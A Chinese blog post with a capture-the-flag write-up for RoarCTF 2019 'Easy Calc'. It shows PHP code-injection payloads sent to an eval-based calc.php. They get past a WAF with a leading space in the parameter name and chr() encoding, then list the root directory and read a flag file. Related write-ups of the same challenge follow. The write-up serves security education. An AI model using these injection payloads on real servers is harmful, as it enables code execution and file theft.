[RoarCTF 2019]Easy Calc 1

最新推荐文章于 2023-12-15 12:02:29 发布
最新推荐文章于 2023-12-15 12:02:29 发布
阅读量3k 收藏 9
点赞数 10
分类专栏: CTF 文章标签: php web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/snowlyzz/article/details/123459590
版权

写给自己看 方便理解。

查看源代码

看到了URL

试试访问calc.php

尝试给num传参:发现只能传数字 而不能传字母。而我们要读取的可能就是flag这个文件

那我们可以利用PHP的字符串解析特性来绕过WAF,在num前面加上空格

绕过num传参后,我们要读取他根目录下的文件。

也就是

calc.php? num=print_r(scandir('/'));   

却发现他没有返回我们想要的答案

 

抓包看看

发现他把  ' '  引号给过滤掉了 

那就用chr()绕过,chr(47)就是斜杠/     :

? num=print_r(scandir(chr(47)));

 输入后 可以浏览根目录下的文件,而其中的falgg就是我们要读取的文件

? num=print_r(file_get_contents('/flagg'));

其中/flagg 用chr进行绕过

? num=print_r(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))); 

 

 完结收工

snowlyzz
关注
  • 10
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
css3中的calc函数浅析
09-22
calc()对大家来说,或许很陌生,不太会相信calc()是css中的部分。但它却是就是css3的一部分,下面这篇文章主要给大家介绍了关于css3中calc函数的相关资料,文中通过示例代码介绍的非常详细,需要的朋友可以参考下
demo_calc1
02-13
demo_calc1
CRC_Calc .rar
12-04
压缩包内包含CRC_Calc和CheckOut两种全面的CRC计算器,涵盖几乎所有类型的CRC算法的计算,方便快捷,
Calc Easy-开源
05-29
一个相当简单的快速计算器实现示例。
my_calc.rar_calc
09-24
基于Delphi7开发的Windows科学计算器
calc1
02-12
calc1
BUUCTF [RoarCTF 2019]Easy Calc1
lzu_lfl的博客
09-11 1298
BUUCTF [RoarCTF 2019]Easy Calc1 WP
[RoarCTF 2019]Easy Calc1
陈艺秋的博客
07-02 558
看这个输入框,所以我猜测可能是sql注入,弹出了一个对话框,说算不来,说明可能存在过滤最后发现只要传入字母都会触发弹窗,应该跟题目设定有关系,这只是一个简单的计算器而已查看了一下源码,发现有一个传参,访问一下calc.php文件访问后得到一串php源码首先建立了一个黑名单列表,然后是一个foreach循环,用于遍历$blacklist数组中的每个元素。在循环中,blackitem变量被赋值为blacklist数组中的当前元素。然后,循环体内的代码会执行,可以对$blackitem进行任何操作。
[RoarCTF 2019]Easy Calc1 wp
最新发布
m0_73612768的博客
12-15 1238
这里用到的方法有:空格绕过,url 溢出,http 请求走私。三种方法均可用来绕过 waf
win32calc简繁版
09-07
Win32 版本的计算器,简洁易用,从 LTSC 版本剥离。如果厌恶臃肿华而不实的 UWP 版计算器,可以试试这个版本。
calc32ver1-开源
07-06
有用的计算器,带有选项 hex、dec、bin、sci、fix、deg、rad。 并带有历史计算。 用 C++ 编程,适用于 Windows。 在 C++ Builder 6 中创建。
sm.rar_calc
09-14
Program for calc symplex method...
adfmp1h21-calc
04-11
adfmp1h21-calc截屏
buuctf-web-[RoarCTF 2019]Easy Calc1
mlws1900的博客
01-18 1163
file_get_contents() 函数是用于将文件的内容读入到一个字符串中的首选方法。需要对num进行传参,并且有黑名单,需要进行绕过。尝试单引号发现提示,但是并未报错,非sql注入。chr(47)是“/”的ASCII编码。chr(102)是f的ASCII编码。chr(103)是g的ASCII编码。chr(47)是/的ASCII编码。chr(49)是1的ASCII编码。chr(97)是a的ASCII编码。找到一段JavaScript脚本。进行内容读取的payload。访问calc.php
【BUUCTF】[RoarCTF 2019]Easy Calc1
aoao331198的博客
03-14 332
题目网页是一个计算器 查看源代码发现线索calc.php 直接访问 这里对eval对get的内容执行,尝试注入php代码 前面也说了waf,我们这里利用php解析字符串的特性来绕过 PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事: 1)删除空白符 2)将某些字符转换为下划线(包括空格) 图片来源博客PHP字符串解析特性 ($GET/$POST参数绕过)(含例题 buuctf easycalc)_bin789456的博客-CS...
[RoarCTF 2019]Easy Calc 1(PHP字符串解析漏洞)
weixin_45253573的博客
11-17 402
打开环境 右键查看源码 <!DOCTYPE html> <html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>简单的计算器</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <
Easy Calc的wp及目录分隔符(/)的一种少见的绕过姿势
2301_77004573的博客
06-07 190
发现eval函数,明确需要通过它获取flag。这道题的思路很像经典的ping ping的做法,不同就是ping ping是通过系统命令执行(ls /)来获取目录找寻flag,本题是通过eval函数中的echo获取。所以需要使用var_dump(scandir(/))来打印出目录,然后观察到/被过滤了,所以需要绕过。
[roarctf 2019]easy calc
03-16
这道题是一道简单的逆向工程题目,给出了一个计算器程序和加密后的标志,需要我们破解加密算法并计算出正确的标志。 我们可以使用反编译工具对程序进行反编译,然后找到加密算法的相关代码。在这个程序中,加密算法使用了一种简单的替换算法,它会将输入字符串中的每个字符替换成固定的字符。 我们只需要编写一个解密程序,使用相同的替换表将加密后的标志还原成原始标志。一旦还原了标志,我们就可以提交它来获得得分。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值